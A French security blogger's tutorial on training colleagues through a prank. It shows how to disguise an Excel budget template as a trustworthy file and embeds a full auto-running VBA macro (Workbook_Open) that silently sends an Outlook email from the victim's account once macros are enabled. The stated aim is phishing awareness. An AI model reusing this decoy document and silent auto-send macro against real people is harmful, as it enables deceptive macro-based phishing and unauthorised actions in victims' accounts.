Troll for fun and croissants

Cet article fait suite a mon premier article : Troller en évitant de se faire croissanter.

La sensibilisation c'est bien, quand elle est éfficace c'est mieux ! Depuis que je travaille dans l'infosec j'ai déjà arrété d'y croire. Pascal l'organisateur de soirée, Véronique la RH ou Roger le trésorier ouvriront toujours le dernier SPAM du jour si celui-ci arrive dans leur boite mail et cela même 1 mois après un stage de sensibilisation. Et pourquoi ça ? Parce qu'ils s'en foutent tout simplement et c'est l'équipe en charge de la sécurité qui se retrouve à devoir lutter contre du malware de masse (malware bancaire, ransomware...) au lieu de faire de la "vraie" sécurité, et faire de la défence réactive vouée à l'echec au lieu de faire de la défense proactive.

Maintenant imaginons une boite avec une bonne ambiance. J'espère que que chez vous c'est le cas sinan la suite me semble difficilement envisageable, quoi-que...

La règle de base est de toujours verrouiller son ordinateur à partir du moment ou l'on s'en éloigne sous peine de se faire croissanter (envoi d'un mail à son insu aux collègues pour les informer que l'on apportera les croissants).

Adaptation de la règle à la sensibilisation

Il est possible d'appliquer cette règle dans le cas d'ouverture de SPAM ! je ne parle pas ici de transférer le maximum de SPAM avec dropper de ransomware aux collègues cela pourrait assez mal finir :p
L'idée est ici de créer soit même un faux SPAM qui, si celui-ci était ouvert aurait comme action l'envoi d'un mail à ses collègues par l'intermédiaire d'une liste de diffusion !

Aujourd'hui la majorité des SPAM sont soit des archives zip avec un fichier javascript à l'intérieur soit des documents Microsoft Word ou Excel avec des Macro en Visual Basic. Le langage Visual Basic est clairement imbuvable et je n'en écrirais dans ma vie uniquement que dans des cas similaires à celui-la.

Création du document piègé.

Choisir un fichier excel crédible, qui peut inspirer confiance. Pour changer des fausses factures Free on peut prendre un document excel de simulation de budget mensuel proposé par defaut dans les modèles Excel. Dans ce genre de fichier les victimes seront plus aptes à activer les Macro.

alt

Il faut activer l'onglet developpeur dans les options :

alt

Dans l'onglet développeur, ciquez sur Visual Basic ou [Alt+F11]

alt

Créez la Macro :

alt

Code de la Macro Visual Basic :

Private Sub Workbook_Open()  
    SendMessage (True)
End Sub


Sub SendMessage(DisplayMsg As Boolean, Optional AttachmentPath)

    Set objOutlook = CreateObject("Outlook.Application")
    Set objOutlookMsg = objOutlook.CreateItem(olMailItem)
    With objOutlookMsg
        Set objOutlookRecip = .Recipients.Add("arishitz@gmail.com")
        ' Set the Subject, Body, and Importance of the message.
        .Subject = "Croissants"
        .Body = "o/ Parce que je suis un n00b qui ouvre des SPAMs et qui clique partout. Merci ari_ pour la sensibilisation. \o" & vbCrLf & vbCrLf
        .Importance = olImportanceHigh  'High importance

        If Not IsMissing(AttachmentPath) Then
            Set objOutlookAttach = .Attachments.Add(AttachmentPath)
        End If

        For Each objOutlookRecip In .Recipients
            objOutlookRecip.Resolve
        Next

        .Save
        .Send
    End With
    Set objOutlook = Nothing
End Sub

N'oubliez pas de remplacer mon adresse mail par la votre ou une liste de diffusion, sinon il faudra me les apporter !

Ensuite enregistrez le document et envoyez le par mail à un/vos collègue(s) et attendez. Si après ouverture du document la macro est activée par un collègue vous devriez recevoir votre mail automatique et le lendemain ou quelques jour plus tard, les croissants devraient être présent le matin au travail :].

Si vous avez suivi mon premier tuto vous serez aussi protégé contre ce SPAM (pratique pour les tests) !

Fap'ment,

Ari